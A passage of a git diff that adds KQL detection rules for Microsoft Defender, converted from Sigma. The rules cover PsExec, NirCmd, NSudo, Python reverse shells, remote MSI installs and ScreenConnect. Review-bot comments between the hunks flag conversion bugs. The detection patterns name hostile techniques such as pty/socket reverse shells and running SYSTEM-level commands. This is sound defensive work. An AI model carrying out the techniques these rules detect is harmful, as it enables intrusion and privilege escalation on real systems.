+| where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ")
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
new file mode 100644
index 00000000..272c80d0
--- /dev/null
+++ b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
@@ -0,0 +1,14 @@
+// Title: PowerShell MSI Install via WindowsInstaller COM From Remote Location
+// Author: Meroujan Antonyan (vx3r)
+// Date: 2025-06-05
+// Level: medium
+// Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the
+Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
+This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
+And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "://127.0.0.1" or ProcessCommandLine contains "://localhost")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql b/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql
new file mode 100644
index 00000000..5d5ca8da
--- /dev/null
+++ b/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Execution Policy Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
+// Date: 2023-10-18
+// Level: low
+// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Likely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts"
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_script_run_in_appdata.kql b/KQL/rules/Execution/powershell_script_run_in_appdata.kql
new file mode 100644
index 00000000..ab84e448
--- /dev/null
+++ b/KQL/rules/Execution/powershell_script_run_in_appdata.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Run in AppData
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-09
+// Level: medium
+// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..d78c66d2
--- /dev/null
+++ b/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql
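Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` in the execution-policy rule is the Sysmon rendering of the Details field; DeviceRegistryEvents does not format DWORD data that way (the type is carried in RegistryValueType and the data is, as far as I know, the plain decimal string), so this comparison is unlikely to ever match and the rule is silently dead. Suggested form, to be confirmed against a live query: `| where RegistryValueType == "Dword" and RegistryValueData == "1" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell" and RegistryValueName =~ "EnableScripts"`. Because the rule is `low` level and documented as FP-prone, nobody will notice it never fires unless it is tested once after conversion.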
@@ -0,0 +1,10 @@
+// Title: Process Reconnaissance Via Wmic.EXE
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/psexec_execution.kql b/KQL/rules/Execution/psexec_execution.kql
new file mode 100644
index 00000000..8b319c6f
--- /dev/null
+++ b/KQL/rules/Execution/psexec_execution.kql
@@ -0,0 +1,12 @@
+// Title: Psexec Execution
+// Author: omkar72
+// Date: 2020-10-30
+// Level: medium
+// Description: Detects user accept agreement execution in psexec commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1569, attack.t1021
+// False Positives:
+// - Administrative scripts.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c"
\ No newline at end of file
diff --git a/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql b/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql
new file mode 100644
index 00000000..09046461
--- /dev/null
+++ b/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql
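Review bot: In the Psexec Execution hunk the Description `Detects user accept agreement execution in psexec commandline` does not describe the query, which matches only the image path or original file name and never looks at ProcessCommandLine. Either reword the header to what is detected, e.g. `// Description: Detects execution of the PsExec binary, identified by image path or original file name`, or add the command-line condition the description implies; an analyst triaging an alert from this rule will otherwise look for an argument that was never checked. The `psexec.c` original-file-name check is correct as written and can stay.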
@@ -0,0 +1,12 @@
+// Title: PsExec Service Child Process Execution as LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/Execution/psexec_service_execution.kql b/KQL/rules/Execution/psexec_service_execution.kql
new file mode 100644
index 00000000..56742b39
--- /dev/null
+++ b/KQL/rules/Execution/psexec_service_execution.kql
@@ -0,0 +1,12 @@
+// Title: PsExec Service Execution
+// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)
+// Date: 2017-06-12
+// Level: medium
+// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate administrative tasks
+
+DeviceProcessEvents
+| where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/psexec_service_file_creation.kql b/KQL/rules/Execution/psexec_service_file_creation.kql
new file mode 100644
index 00000000..b1087ac5
--- /dev/null
+++ b/KQL/rules/Execution/psexec_service_file_creation.kql
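Review bot: `AccountName contains "AUTHORI" or AccountName contains "AUTORI"` ports the Sysmon User field (`NT AUTHORITY\SYSTEM` and its localized forms), but in DeviceProcessEvents the authority part is reported in AccountDomain and AccountName holds only the user name, so this predicate should never match and the high-level rule is dead. Matching the well-known SID is both locale-independent and unambiguous: `| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and AccountSid =~ "S-1-5-18"`. If the substring checks are kept for some reason they belong on AccountDomain, not AccountName.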
@@ -0,0 +1,10 @@
+// Title: PsExec Service File Creation
+// Author: Thomas Patzke
+// Date: 2017-06-12
+// Level: low
+// Description: Detects default PsExec service filename which indicates PsExec service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\PSEXESVC.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_advancedrun_execution.kql b/KQL/rules/Execution/pua_advancedrun_execution.kql
new file mode 100644
index 00000000..6e2ae8db
--- /dev/null
+++ b/KQL/rules/Execution/pua_advancedrun_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - AdvancedRun Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-20
+// Level: medium
+// Description: Detects the execution of AdvancedRun utility
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_nircmd_execution.kql b/KQL/rules/Execution/pua_nircmd_execution.kql
new file mode 100644
index 00000000..b63c5e66
--- /dev/null
+++ b/KQL/rules/Execution/pua_nircmd_execution.kql
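Review bot: The DeviceFileEvents query in the PsExec Service File Creation hunk has no ActionType filter, so a rule titled and described as file creation also fires when PSEXESVC.exe is modified, renamed or deleted, i.e. at least once more per session when the service binary is cleaned up, without adding signal. Restrict it to the event the Sigma file_event category means: `| where ActionType == "FileCreated" and FolderPath endswith "\\PSEXESVC.exe"`. The same check is worth applying to every other file_event conversion in this commit.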
@@ -0,0 +1,12 @@
+// Title: PUA - NirCmd Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-24
+// Level: medium
+// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide "))
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql b/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql
new file mode 100644
index 00000000..b7733538
--- /dev/null
+++ b/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NirCmd Execution As LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of NirCmd tool for command execution as SYSTEM user
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " runassystem "
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_nsudo_execution.kql b/KQL/rules/Execution/pua_nsudo_execution.kql
new file mode 100644
index 00000000..6a97abed
--- /dev/null
+++ b/KQL/rules/Execution/pua_nsudo_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NSudo Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of NSudo tool for command execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql b/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql
new file mode 100644
index 00000000..b5afa733
--- /dev/null
+++ b/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - Radmin Viewer Utility Execution
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1072
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_runxcmd_execution.kql b/KQL/rules/Execution/pua_runxcmd_execution.kql
new file mode 100644
index 00000000..9f1eaeaf
--- /dev/null
+++ b/KQL/rules/Execution/pua_runxcmd_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - RunXCmd Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec="
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql b/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql
new file mode 100644
index 00000000..462dc670
--- /dev/null
+++ b/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - Wsudo Suspicious Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-02
+// Level: high
+// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/python_inline_command_execution.kql b/KQL/rules/Execution/python_inline_command_execution.kql
new file mode 100644
index 00000000..7156c54c
--- /dev/null
+++ b/KQL/rules/Execution/python_inline_command_execution.kql
@@ -0,0 +1,12 @@
+// Title: Python Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Python libraries that use a flag starting with "-c". Filter according to your environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python")) or ((ProcessCommandLine contains "-W ignore::DeprecationWarning" and ProcessCommandLine contains "['install', '--no-cache-dir', '--no-index', '--find-links'," and ProcessCommandLine contains "'--upgrade', 'pip'") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python"))))) and (not(((ProcessCommandLine contains "" and ProcessCommandLine contains "exec(compile(") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft VS Code\\Code.exe", "C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
new file mode 100644
index 00000000..b4a96c2a
--- /dev/null
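Review bot: The last exclusion in the where clause carries a vacuous term, `ProcessCommandLine contains ""`, which is true for every row and looks like a converter artifact from an empty list entry in the source rule; as written that branch reduces to `ProcessCommandLine contains "exec(compile("`, so either drop the empty term or restore the value the source rule intended. I would also note in the header that `" -c"` has no trailing space and therefore matches any argument that merely starts with -c, which is what the False Positives line alludes to, so the rule needs an environment-specific allow-list before it is enabled at this level.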
+++ b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
@@ -0,0 +1,11 @@
+// Title: Python Reverse Shell Execution Via PTY And Socket Modules
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-24
+// Level: high
+// Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "import" and ProcessCommandLine contains "pty" and ProcessCommandLine contains "socket" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains ".connect") and FolderPath contains "python"
\ No newline at end of file
diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql b/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql
new file mode 100644
index 00000000..235e05ac
--- /dev/null
+++ b/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql
@@ -0,0 +1,10 @@
+// Title: Python Spawning Pretty TTY on Windows
+// Author: Nextron Systems
+// Date: 2022-06-03
+// Level: high
+// Description: Detects python spawning a pretty tty
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn")
\ No newline at end of file
diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
new file mode 100644
index 00000000..fbb6a34e
--- /dev/null
+++ b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
@@ -0,0 +1,11 @@
+// Title: Python Spawning Pretty TTY Via PTY Module
+// Author: Nextron Systems
+// Date: 2022-06-03
+// Level: medium
+// Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "import pty" or ProcessCommandLine contains "from pty ") and ProcessCommandLine contains "spawn" and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3."))
\ No newline at end of file
diff --git a/KQL/rules/Execution/query_usage_to_exfil_data.kql b/KQL/rules/Execution/query_usage_to_exfil_data.kql
new file mode 100644
index 00000000..1939f522
--- /dev/null
+++ b/KQL/rules/Execution/query_usage_to_exfil_data.kql
@@ -0,0 +1,10 @@
+// Title: Query Usage To Exfil Data
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: medium
+// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql b/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql
new file mode 100644
index 00000000..281ffec0
--- /dev/null
+++ b/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: Read Contents From Stdin Via Cmd.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-07
+// Level: medium
+// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql b/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql
new file mode 100644
index 00000000..84cb2c88
--- /dev/null
+++ b/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql
@@ -0,0 +1,12 @@
+// Title: Rebuild Performance Counter Values Via Lodctr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-15
+// Level: medium
+// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage by an administrator
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r" or ProcessCommandLine contains " –r" or ProcessCommandLine contains " —r" or ProcessCommandLine contains " ―r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/remcom_service_file_creation.kql b/KQL/rules/Execution/remcom_service_file_creation.kql
new file mode 100644
index 00000000..9a539835
--- /dev/null
+++ b/KQL/rules/Execution/remcom_service_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: RemCom Service File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-04
+// Level: medium
+// Description: Detects default RemCom service filename which indicates RemCom service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\RemComSvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
new file mode 100644
index 00000000..da1cace6
--- /dev/null
+++ b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
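Review bot: The DeviceFileEvents query has no ActionType filter, so it fires on deletion, rename and modification events for RemComSvc.exe as well as on the creation the title describes; add `| where ActionType == "FileCreated"` (or `ActionType in ("FileCreated", "FileRenamed")` if renames should count) ahead of the path check. The Remote Access Tool - ScreenConnect Temporary File hunk is also a DeviceFileEvents rule and has the same gap. If the converter emits DeviceFileEvents for every file-creation source rule, the ActionType predicate belongs in the converter rather than in each rule.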
@@ -0,0 +1,16 @@
+// Title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
+// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-08
+// Level: medium
+// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
+Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
+Use this rule to detect instances of older versions of Anydesk using the compromised certificate
+This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql
new file mode 100644
index 00000000..a7e2f8ec
--- /dev/null
+++ b/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql
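Review bot: The Description continuation lines `+Prior to version 8.0.8, ...`, `+Use this rule ...` and `+This is recommended ...` are emitted without the `//` prefix, so they are bare text inside the query and will not parse as KQL; the converter should prefix every line of a multi-line description with `// `. The Remote Access Tool - ScreenConnect Temporary File and Service Reconnaissance Via Wmic.EXE hunks have the same defect. Separately, `ProcessVersionInfoProductVersion startswith "8.0.1"` also matches any 8.0.1x release (8.0.10 and later, if present in your environment), which would not use the revoked certificate; matching `"8.0.1."` or comparing parsed version components would avoid that false positive.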
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - ScreenConnect Remote Command Execution
+// Author: Ali Alwashali
+// Date: 2023-10-10
+// Level: low
+// Description: Detects the execution of a system command via the ScreenConnect RMM service.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
new file mode 100644
index 00000000..10e57e1f
--- /dev/null
+++ b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - ScreenConnect Temporary File
+// Author: Ali Alwashali
+// Date: 2023-10-10
+// Level: low
+// Description: Detects the creation of files in a specific location by ScreenConnect RMM.
+ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Legitimate use of ScreenConnect
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql b/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql
new file mode 100644
index 00000000..97a8b480
--- /dev/null
+++ b/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Remote DLL Load Via Rundll32.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects a remote DLL load event via "rundll32.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
+| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql b/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql
new file mode 100644
index 00000000..65dc81c2
--- /dev/null
+++ b/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql
@@ -0,0 +1,12 @@
+// Title: Remote PowerShell Session Host Process (WinRM)
